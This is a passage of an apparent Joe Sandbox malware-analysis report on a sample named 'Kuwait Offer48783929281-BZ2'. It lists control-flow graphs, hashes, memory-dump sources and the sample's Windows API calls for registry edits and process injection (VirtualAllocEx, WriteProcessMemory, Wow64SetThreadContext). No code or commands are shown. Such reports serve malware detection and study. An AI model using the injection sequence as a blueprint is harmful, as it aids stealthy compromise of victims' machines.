                                          • Instruction ID: e563833edf704fd4dce9a3764ad606bda9d2b1c9055c738c5d0b805b17020e74
                                          • Opcode Fuzzy Hash: 7c478d1f92f483b0134122d6117e09e9c84b7ae3c08d36b7b4e8c912fe472433
                                          • Instruction Fuzzy Hash: 7251D0B4D007199FDF54CFA9C885B9EBBB1FF09300F149429E818AB251DB749985CF54

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1285 6620bc8-6620c44 1287 6620c46-6620c5a 1285->1287 1288 6620c8a-6620cbf 1285->1288 1287->1288 1293 6620c5c-6620c61 1287->1293 1291 6620cc1-6620cd3 1288->1291 1292 6620cd6-6620d38 RegSetValueExA 1288->1292 1291->1292 1299 6620d41-6620da2 1292->1299 1300 6620d3a-6620d40 1292->1300 1294 6620c63-6620c6d 1293->1294 1295 6620c84-6620c87 1293->1295 1297 6620c71-6620c80 1294->1297 1298 6620c6f 1294->1298 1295->1288 1297->1297 1301 6620c82 1297->1301 1298->1297 1306 6620db2 1299->1306 1307 6620da4-6620da8 1299->1307 1300->1299 1301->1295 1309 6620db3 1306->1309 1307->1306 1308 6620daa 1307->1308 1308->1306 1309->1309
                                          APIs
                                          • RegSetValueExA.KERNEL32(?,?,?,?,?,?), ref: 06620D28
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366605467.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6620000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: Value
                                          • String ID:
                                          • API String ID: 3702945584-0
                                          • Opcode ID: b614a0230ed747f3029fc6d787146a7dedf9d745270bd533e888ac7e80b6a84d
                                          • Instruction ID: 2b9e02908c84f23ff186ce9cafe29bb03b7ba9ce29795f71d1f5772aac82d6b7
                                          • Opcode Fuzzy Hash: b614a0230ed747f3029fc6d787146a7dedf9d745270bd533e888ac7e80b6a84d
                                          • Instruction Fuzzy Hash: 3D51CEB4D007199FDF54CFA9C885BAEBBB1FF09300F14942AE818AB251DB749985CF54

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1310 6620984-6620a06 1313 6620a08-6620a1c 1310->1313 1314 6620a4c-6620ac8 RegOpenKeyExA 1310->1314 1313->1314 1317 6620a1e-6620a23 1313->1317 1323 6620ad1-6620b30 1314->1323 1324 6620aca-6620ad0 1314->1324 1318 6620a46-6620a49 1317->1318 1319 6620a25-6620a2f 1317->1319 1318->1314 1321 6620a33-6620a42 1319->1321 1322 6620a31 1319->1322 1321->1321 1325 6620a44 1321->1325 1322->1321 1330 6620b32-6620b36 1323->1330 1331 6620b40 1323->1331 1324->1323 1325->1318 1330->1331 1332 6620b38 1330->1332 1333 6620b41 1331->1333 1332->1331 1333->1333
                                          APIs
                                          • RegOpenKeyExA.KERNEL32(?,?,?,?,?), ref: 06620AB8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366605467.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6620000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: d69d54af65757fdbc3b2854c606140c24ad15d7165475c04fcf2493a805fcedb
                                          • Instruction ID: 4f88b62b20ea6abb494e91012397a01fb3f1f48509c6530ee90062e9f491ab6b
                                          • Opcode Fuzzy Hash: d69d54af65757fdbc3b2854c606140c24ad15d7165475c04fcf2493a805fcedb
                                          • Instruction Fuzzy Hash: 0151FEB4D003199FDF60CFA9D981B9EBBB1FB09300F209029E818A7241DB759981CF95
                                          APIs
                                          • RegOpenKeyExA.KERNEL32(?,?,?,?,?), ref: 06620AB8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366605467.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6620000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: fd36ca9b1ca0e49b10bdc9e1a281638cadfb9cd7d85a5ead8c8b53f0a50203ce
                                          • Instruction ID: 408c0f216b4bdb61e8bc1433c8ddb8a16d4a376c3e4779123c0fd50a6bf1cd8a
                                          • Opcode Fuzzy Hash: fd36ca9b1ca0e49b10bdc9e1a281638cadfb9cd7d85a5ead8c8b53f0a50203ce
                                          • Instruction Fuzzy Hash: 4651DDB4D003199FDF54CFA9D981B9EBBB1FF09300F20902AE818AB251DB759985CF45
                                          APIs
                                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0634E94B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 709fdac8a21dbd5c256f5a2cc8fb2ec8e74408ba9b1871b3839fe48387b26aeb
                                          • Instruction ID: 51b21646ae7f35d54d293d735812a5b51e57f7c297d829c004f211553a1ec1f5
                                          • Opcode Fuzzy Hash: 709fdac8a21dbd5c256f5a2cc8fb2ec8e74408ba9b1871b3839fe48387b26aeb
                                          • Instruction Fuzzy Hash: 8B41CCB5D012589FCF00CFA9D980AEEFBF1BB49310F14902AE818B7240C375A945CFA4
                                          APIs
                                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0634E94B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 5f365db7886b6bb5fa989ebe53300adccf8aaef456ec6d0ce821367b68cc2458
                                          • Instruction ID: 19ff90c2d4f267889b6b5e8714c9b89d719bfbc487edb7456dc5d4917c1e1c73
                                          • Opcode Fuzzy Hash: 5f365db7886b6bb5fa989ebe53300adccf8aaef456ec6d0ce821367b68cc2458
                                          • Instruction Fuzzy Hash: 8441BAB5D012589FCF00CFA9D984AEEFBF1BB49310F14902AE818B7250D379AA45CF54
                                          APIs
                                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0634E7C2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: d921db9ab7e241d7b9671abbcc6e8b4ee55d19904d26e1493c4c81f85d0b5244
                                          • Instruction ID: 49fc65281edcdcb9992d7e0672e6a1cf0f2dd71fe04c229eff68c5493e40db0c
                                          • Opcode Fuzzy Hash: d921db9ab7e241d7b9671abbcc6e8b4ee55d19904d26e1493c4c81f85d0b5244
                                          • Instruction Fuzzy Hash: D631ACB9D04258EFCF10CFA9D884ADEFBB5BB09310F10942AE815B7210D775A946CF94
                                          APIs
                                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0634E7C2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 5f551d053f34c60a58f122a7173d40a1b626b9260e1360fa5401644535eb70d3
                                          • Instruction ID: 2c9ecce01e0f4fd33844a1c2f33a81fe9fc6660649b63fc3881d00b835f0295e
                                          • Opcode Fuzzy Hash: 5f551d053f34c60a58f122a7173d40a1b626b9260e1360fa5401644535eb70d3
                                          • Instruction Fuzzy Hash: C531A8B8D04258DFCF10CFA9D880ADEFBB5BB09310F10942AE815B7210D775A946CF94
                                          APIs
                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0634EE0C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 0d8ae5f9a2f7485392490abd6d988d4abac476f2849899caaf92a975b3d9f5a4
                                          • Instruction ID: 5dc5f35e72f4729e14cdb794bebf304f5ec0d152de2a63f98897d5f183cc6be5
                                          • Opcode Fuzzy Hash: 0d8ae5f9a2f7485392490abd6d988d4abac476f2849899caaf92a975b3d9f5a4
                                          • Instruction Fuzzy Hash: F431DAB8D012589FCF10CFA9D884AEEFBB0BB09310F14902AE814B7210D775A985CFA4
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 0634E267
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 33f159d96b18c164b62a708118f70c4b80186c0c054449dd91207a86eb9109c2
                                          • Instruction ID: 7576ec0f13379a5942a5c3db1a239c81ce38ba2fbd4be14a287374780097013d
                                          • Opcode Fuzzy Hash: 33f159d96b18c164b62a708118f70c4b80186c0c054449dd91207a86eb9109c2
                                          • Instruction Fuzzy Hash: 3041EDB4D012589FDB10DFA9D884AEEFBF5BF49310F14802AE419B7240D778A985CFA4
                                          APIs
                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 062E04BC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365320548.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_62e0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 0fc40d3ec8959906d87f40d9de9afa6ec5c04ac444b45fdf81e052554d777f98
                                          • Instruction ID: a14d7b05933831a67cce272d29830845d29483d908193f4652aad957048e6130
                                          • Opcode Fuzzy Hash: 0fc40d3ec8959906d87f40d9de9afa6ec5c04ac444b45fdf81e052554d777f98
                                          • Instruction Fuzzy Hash: 083197B8D00248AFCF10CFA9D984A9EFBB1BF49310F14942AE815BB250D775A946CF94
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: d
                                          • API String ID: 0-2564639436
                                          • Opcode ID: cf35dd341efaacae79122136a9ff9a8a008d878c5741156b8499d399c788c127
                                          • Instruction ID: 1e045177b33856bd62da8476eda6d361a7dfc07c54970ff5b7da43f7f575be48
                                          • Opcode Fuzzy Hash: cf35dd341efaacae79122136a9ff9a8a008d878c5741156b8499d399c788c127
                                          • Instruction Fuzzy Hash: 82D17B34600616CFCB14CF28C494A6AB7F6FF88314B65C969D45A8B761DB30FC46CB90
                                          APIs
                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0634EE0C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: bc8e4036a3662f7c2d025a7329348bf27b00d2ef43ee2873af9bc60e27925d6a
                                          • Instruction ID: 0c7465d90640b2cecc1d780c88b84f26bbf85f6c3511e365dcdd1e37eec477f0
                                          • Opcode Fuzzy Hash: bc8e4036a3662f7c2d025a7329348bf27b00d2ef43ee2873af9bc60e27925d6a
                                          • Instruction Fuzzy Hash: 7631C8B8D002589FCF10CFAAD884AEEFBF0BB09310F14942AE814B7210D775A985CF94
                                          APIs
                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 062E04BC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365320548.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_62e0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 5c0d2237eb78cee83ee72f0610d94394df3d14b6e3c04e312e4875cebff3963b
                                          • Instruction ID: 1f061ac00e47564047cc6d64d1c622656ea00c34925c253e9873fe8b32d10400
                                          • Opcode Fuzzy Hash: 5c0d2237eb78cee83ee72f0610d94394df3d14b6e3c04e312e4875cebff3963b
                                          • Instruction Fuzzy Hash: 9C31A7B8D002089FCF10CFA9D980AAEFBB0BB49310F14942AE819B7210D775A946CF94
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 0634E267
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 44ccefcd684aee18ead37bff670cefa7daa271208dbc929af546251dac7a0dc1
                                          • Instruction ID: 78426e0d07d3cced2fe8f007578da7f962792cf316f1de79ffce556ffabd220f
                                          • Opcode Fuzzy Hash: 44ccefcd684aee18ead37bff670cefa7daa271208dbc929af546251dac7a0dc1
                                          • Instruction Fuzzy Hash: 7131BBB4D012589FDB14DFAAD884AEEFBF1BB49310F14802AE418B7240D779A945CF94
                                          APIs
                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 062E167F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365320548.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_62e0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 2e1e42924026c1ccb10f0a4a9b0ba7e016583b29e6bc20aadfdabf72bbb2ca6e
                                          • Instruction ID: 0155a9b29f9867bd3765c4c97b338998afc9a934d16717d9682d5ad09e811227
                                          • Opcode Fuzzy Hash: 2e1e42924026c1ccb10f0a4a9b0ba7e016583b29e6bc20aadfdabf72bbb2ca6e
                                          • Instruction Fuzzy Hash: 8D31C8B8D002089FDF14CFA9D884AEEFBB0AF49310F14942AE815B7210C775A945CF94
                                          APIs
                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 062E167F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365320548.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_62e0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 9867f2e22252c14227c5d5f984267c013dadcb7fbb22a00bfa052fbc23322e38
                                          • Instruction ID: 6ebbf061193b046f687f9ceb32353d26a5bcf9b354bce26b2ce03ebbc7e78373
                                          • Opcode Fuzzy Hash: 9867f2e22252c14227c5d5f984267c013dadcb7fbb22a00bfa052fbc23322e38
                                          • Instruction Fuzzy Hash: 463198B8D012489FDF14CFA9D884AEEFBB1AF49310F14942AE815B7210D775A945CF94
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: e
                                          • API String ID: 0-4024072794
                                          • Opcode ID: 13a15da96c7745b36c74bd39c7981e400c33eb5d3ae723c10fb824dc298c973b
                                          • Instruction ID: 56875ac73f153e64494e9148c8adb8c636050a1c840d9016dde648f68a170037
                                          • Opcode Fuzzy Hash: 13a15da96c7745b36c74bd39c7981e400c33eb5d3ae723c10fb824dc298c973b
                                          • Instruction Fuzzy Hash: C121D374904259CFDBA5DF24CC88B99BBB6BF49300F4141E9E40AA7650EB309E84CF41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1367100640.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_67a0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: N
                                          • API String ID: 0-1130791706
                                          • Opcode ID: b9d80689b3c2fe1cca153ae3e62dd23c4d5ec9b8c471b4f392b8d5c4cc06af8a
                                          • Instruction ID: 6649b0126cc8d2fc09365005308a9227f5be5d9b3e22cc4a9ed43792b3d7b5be
                                          • Opcode Fuzzy Hash: b9d80689b3c2fe1cca153ae3e62dd23c4d5ec9b8c471b4f392b8d5c4cc06af8a
                                          • Instruction Fuzzy Hash: 4E015B74D0026ACFE7649F54C848BE9B2B5EB44308F0088E8D11AA3680DBB40EC58F50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .
                                          • API String ID: 0-248832578
                                          • Opcode ID: 03594b6e7e741ab9519599cc7ae3e4e2747af02d5681f48b88f74c4eede1ea79
                                          • Instruction ID: 5e2a6b140babfdbff611d2f9a84e752b964a196407fafa6bc020866ed5599937
                                          • Opcode Fuzzy Hash: 03594b6e7e741ab9519599cc7ae3e4e2747af02d5681f48b88f74c4eede1ea79
                                          • Instruction Fuzzy Hash: 01F09274915669CFEB708F54D888BAABBB6FB09355F0045E5D409A3281D7784AC8CF82
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b58893057bebc951e7405cff5ab32faaa8c21cd753c9720559a5b6addc5b1b41
                                          • Instruction ID: 7aee73bbdaa226e4cddfffd95f9103a735c96c9a3c84edf6b4144fedc4d9cb39
                                          • Opcode Fuzzy Hash: b58893057bebc951e7405cff5ab32faaa8c21cd753c9720559a5b6addc5b1b41
                                          • Instruction Fuzzy Hash: 3E521A75A002289FDB64CF69C980BEDBBF6BF88300F1581D9E649A7351DA709D81CF61
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365450801.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6310000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f5bba5f347ec87427db3a060842b3d03b7a4cf7e1d76e3fa6943111faa81eb2
                                          • Instruction ID: 0d7a994235735fe9b880d72685dc0a299b29abc27ee9dc1cbe51afa3ebe90392
                                          • Opcode Fuzzy Hash: 0f5bba5f347ec87427db3a060842b3d03b7a4cf7e1d76e3fa6943111faa81eb2
                                          • Instruction Fuzzy Hash: 6A42B174E04219CFDB98DF95D848AEEB7B6FB89300F109029DA12AB654CB345986CFD1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 08cbab249b11a604416fcc36a3108e4b02fd3e8febe6bee16998f2bee2dfcce9
                                          • Instruction ID: 677fdb749309073477fec1062c0a410c243edcc3a1f6f4d758a66315741329e6
                                          • Opcode Fuzzy Hash: 08cbab249b11a604416fcc36a3108e4b02fd3e8febe6bee16998f2bee2dfcce9
                                          • Instruction Fuzzy Hash: 37227935A00255DFDB44CFA8D490AADBBF6EF89310F148069E906EB3A5DB75EC41CB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 26147955d23f48d1c3ed5c2d268591242b813bdcbd26d51dbfc62f03aef65382
                                          • Instruction ID: 8a2ed5b7ae0dacf1037cf52f9dd8534a4c87d81f4a9bca4e2f5409703e7e3d18
                                          • Opcode Fuzzy Hash: 26147955d23f48d1c3ed5c2d268591242b813bdcbd26d51dbfc62f03aef65382
                                          • Instruction Fuzzy Hash: 50227E30E10229CFDB55DFA5D854AADBBB6FF48310F148069E912A7394DB389E45CF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 26769b3271c5b77651b9e1d8900a13c07e30cb37f482d845e1aed30bb845e215
                                          • Instruction ID: 2395900b95fefc1c3a74d2bfbda6bf44826c0a13436a44c6dcd9ae8e4f6b5e3e
                                          • Opcode Fuzzy Hash: 26769b3271c5b77651b9e1d8900a13c07e30cb37f482d845e1aed30bb845e215
                                          • Instruction Fuzzy Hash: 34027C35B00210DFCB55DF68D894A6EBBB6FF89710F1581A9E5069B3A1CB35EC42CB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365450801.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6310000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 10c52c805c2149f5157d881ea9e591ab113474899ab2d974fc81b01f7f68aa23
                                          • Instruction ID: c9b923f7b2d06e4e6826f1ce5db7e2ca72b84e3c3e52a4ec47a1c1650bf4ad6f
                                          • Opcode Fuzzy Hash: 10c52c805c2149f5157d881ea9e591ab113474899ab2d974fc81b01f7f68aa23
                                          • Instruction Fuzzy Hash: 6A22F774D11218CFCB98DFE8C9546ADB7B6FF4A301F609469C51AAB384DB345A89CF80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 45a2a683be397de76ff3df152aea1ee1e5b54acc4d3c5731158e20aafbf20a98
                                          • Instruction ID: c5c684cc5dd669337fa2edfdbc12302e780dc359bb3f1664e370fbc11f99cff0
                                          • Opcode Fuzzy Hash: 45a2a683be397de76ff3df152aea1ee1e5b54acc4d3c5731158e20aafbf20a98
                                          • Instruction Fuzzy Hash: 2C127930A00215DFDBA5DFA9C894AAEB7F6FF89300F148529D50A9B355DB31EC46CB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9b83674f1e1896ea67093095170752ce204b197e8188d773a2675fb1d730bde8
                                          • Instruction ID: 73159739b6909a7b65fd3fb740141e03a872f6749cf227631546b872b465358a
                                          • Opcode Fuzzy Hash: 9b83674f1e1896ea67093095170752ce204b197e8188d773a2675fb1d730bde8
                                          • Instruction Fuzzy Hash: 7A120F34A002288FDB54DF64C994B9DBBB2BF89300F5195A9E54AAB355DF30ED85CF80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4ba39f960e56d6f4638136e1fa21ebfd0cfe19a10244f82eed3e2950a701c118
                                          • Instruction ID: 822034b7c340ac4e9b93972186dfbd4c314ffb5ed81ed15e27e5116ea45242d6
                                          • Opcode Fuzzy Hash: 4ba39f960e56d6f4638136e1fa21ebfd0cfe19a10244f82eed3e2950a701c118
                                          • Instruction Fuzzy Hash: B3F1FF34B10218CFDB48DFA4D994A9DBBB6FF89301F118159E506AB3A5DB71EC42CB84
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 11585eb71a07f0853108b811a152d028f5846f642cd774082fe927952ea01f02
                                          • Instruction ID: a664485711be090e7b4a545ab4da0dcef0ea4740bcb9ec69a5d277b7be9d5462
                                          • Opcode Fuzzy Hash: 11585eb71a07f0853108b811a152d028f5846f642cd774082fe927952ea01f02
                                          • Instruction Fuzzy Hash: 6CE15234A00219DFCB44DFA8D4949ADBBB6FF89310F108569E916AB364DF30EC46CB95
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365450801.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6310000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 16d893328dd5581239e24b968a115a93f5cbace109b88784ce2d73a543e8a2db
                                          • Instruction ID: f851e90307060784e15b3ad6063d44feb4ec6b840218f2ea0641aab85222c818
                                          • Opcode Fuzzy Hash: 16d893328dd5581239e24b968a115a93f5cbace109b88784ce2d73a543e8a2db
                                          • Instruction Fuzzy Hash: 7EF1F434E11218DFDB98DFA4E4986EDBBB6FF49301F209029E616AB354DB315985CF80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365450801.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6310000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4e4a224b65288fd5f13a7d0e71e7b97662f7f7f645c48c5470ba7ca1e1826357
                                          • Instruction ID: 8bff95f502c81c4788ea8d128be6c4be198539f6e8043eb546a7a9e46ff0be36
                                          • Opcode Fuzzy Hash: 4e4a224b65288fd5f13a7d0e71e7b97662f7f7f645c48c5470ba7ca1e1826357
                                          • Instruction Fuzzy Hash: C2C1D434E00209CFDB98DFA9D8546EEB7B6FF89301F109029D9166B294CB745A86CFD0
                                          Memory Dump Source
